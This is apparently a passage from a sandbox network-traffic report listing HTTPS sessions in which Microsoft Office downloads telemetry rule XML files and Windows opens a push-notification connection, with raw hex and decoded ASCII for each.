                                                                                                                                                                      x-azure-ref: 20241121T052341Z-178bfbc474bxkclvhC1NYC69g400000000wg00000000mgkp
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:41 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      58192.168.2.64977113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:41 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:41 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                      x-ms-request-id: c366b67a-401e-0083-1804-3b075c000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052341Z-r1d97b99577jlrkbhC1TEBq8d000000009u00000000087b8
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:41 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      59192.168.2.64977213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:41 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:41 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                      x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052341Z-178bfbc474bwh9gmhC1NYCy3rs000000015g0000000039t1
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:42 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      60192.168.2.64977313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:42 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:42 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:42 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                                                      x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052342Z-178bfbc474bp8mkvhC1NYCzqnn00000000y00000000034n6
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      61192.168.2.64977413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:42 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:42 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:42 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                      x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052342Z-178bfbc474bscnbchC1NYCe7eg000000012000000000t9kd
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:42 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      62192.168.2.64977540.113.110.67443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:42 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 64 4b 49 35 6d 31 64 44 45 47 79 63 65 74 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 31 62 63 65 37 35 65 66 63 34 61 36 39 63 31 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: WdKI5m1dDEGycetl.1Context: e1bce75efc4a69c1
                                                                                                                                                                      2024-11-21 05:23:42 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                      2024-11-21 05:23:42 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 57 64 4b 49 35 6d 31 64 44 45 47 79 63 65 74 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 31 62 63 65 37 35 65 66 63 34 61 36 39 63 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 72 79 47 49 6c 4b 61 41 6e 50 4f 46 75 6f 37 50 51 78 50 4e 74 7a 2f 55 50 53 70 47 64 79 36 48 49 54 55 4f 41 43 33 4e 76 34 6c 65 44 43 4b 77 6e 41 30 38 78 51 77 58 4f 6d 56 74 55 72 69 36 61 48 65 59 71 38 6d 50 64 46 34 6a 77 51 57 6d 37 79 4c 42 44 64 34 41 5a 52 38 41 6e 45 5a 4d 4f 4b 63 4f 5a 7a 4d 6f 41 2b 2f 62
                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: WdKI5m1dDEGycetl.2Context: e1bce75efc4a69c1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXryGIlKaAnPOFuo7PQxPNtz/UPSpGdy6HITUOAC3Nv4leDCKwnA08xQwXOmVtUri6aHeYq8mPdF4jwQWm7yLBDd4AZR8AnEZMOKcOZzMoA+/b
                                                                                                                                                                      2024-11-21 05:23:42 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 57 64 4b 49 35 6d 31 64 44 45 47 79 63 65 74 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 31 62 63 65 37 35 65 66 63 34 61 36 39 63 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: WdKI5m1dDEGycetl.3Context: e1bce75efc4a69c1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                      2024-11-21 05:23:43 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                      2024-11-21 05:23:43 UTC58INData Raw: 4d 53 2d 43 56 3a 20 47 39 4c 53 39 36 4a 47 2b 30 71 53 31 69 42 66 37 35 32 69 52 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                      Data Ascii: MS-CV: G9LS96JG+0qS1iBf752iRQ.0Payload parsing failed.


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      63192.168.2.64977813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:43 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:43 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                      x-ms-request-id: 906eedcd-201e-0071-4861-3bff15000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052343Z-178bfbc474bh5zbqhC1NYCkdug00000000yg00000000bce2
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      64192.168.2.64977613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:43 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:44 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                      x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052344Z-1777c6cb754j47wfhC1TEB5wrw00000006k0000000002xzt
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      65192.168.2.64977713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:43 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:44 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                      x-ms-request-id: 138215a1-101e-0017-6465-3b47c7000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052344Z-178bfbc474bv7whqhC1NYC1fg400000000yg00000000nfv4
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:44 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      66192.168.2.64977913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:44 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:44 GMT
                                                                                                                                                                      Content-Type: text/xml
